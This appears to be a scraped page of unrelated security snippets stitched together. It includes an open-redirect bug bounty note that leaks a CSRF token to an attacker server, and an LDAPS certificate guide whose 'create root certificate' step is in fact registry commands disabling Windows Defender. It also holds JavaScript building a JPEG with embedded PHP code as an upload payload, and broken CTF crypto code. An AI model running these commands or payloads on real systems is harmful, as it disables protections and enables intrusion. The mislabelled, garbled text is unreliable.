mpgn

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
User loads https://example.com/?code=VALUE
Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
```
GET /verify/VALUE HTTP/1.1
Host: example.com
```

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

Tip

Microsoft active directory servers by default provide LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

Create root certificate

	rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
	rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
	rem To also disable Windows Defender Security Center include this
	rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
	rem 1 - Disable Real-time protection
	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

	var wpnonce = '';
	var ajaxnonce = '';
	var wp_attached_file = '';
	var imgurl = '';
	var postajaxdata = '';
	var post_id = 0;
	var cmd = '<?php phpinfo();/*';
	var cmdlen = cmd.length
	var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
	var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set

	package module

	import (
	"crypto/tls"
	"encoding/hex"
	"github.com/praetorian-inc/trudy/pipe"
	"net"
	)

	//Data is a thin wrapper that provides metadata that may be useful when mangling bytes on the network.

	#!/usr/bin/env python3
	#
	# This is a simple script to encrypt a message using AES
	# with CBC mode in Python 3.
	# Before running it, you must install pycryptodome:
	#
	# $ python -m pip install PyCryptodome
	#
	# Author.: José Lopes
	# Date...: 2019-06-14

	from scryptos import *

	p1 = 32581479300404876772405716877547
	p2 = 27038194053540661979045656526063
	p3 = 26440615366395242196516853423447
	n = p1p2p3
	e = 3

	c = int(open("flag.enc", "rb").read().encode("hex"), 16)

	#!/usr/bin/env python

	"""
	Utility fonction to convert from one form to an other
	"""
	def to_bits(length, N):
	return [int(i) for i in bin(N)[2:].zfill(length)]

	def from_bits(N):
	return int("".join(str(i) for i in N), 2)

	$ErrorActionPreference = "Stop"

	$notificationTitle = "Notification: " + [DateTime]::Now.ToShortTimeString()

	[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] > $null
	$template = [Windows.UI.Notifications.ToastNotificationManager]::GetTemplateContent([Windows.UI.Notifications.ToastTemplateType]::ToastText01)

	#Convert to .NET type for XML manipuration
	$toastXml = [xml] $template.GetXml()
	$toastXml.GetElementsByTagName("text").AppendChild($toastXml.CreateTextNode($notificationTitle)) > $null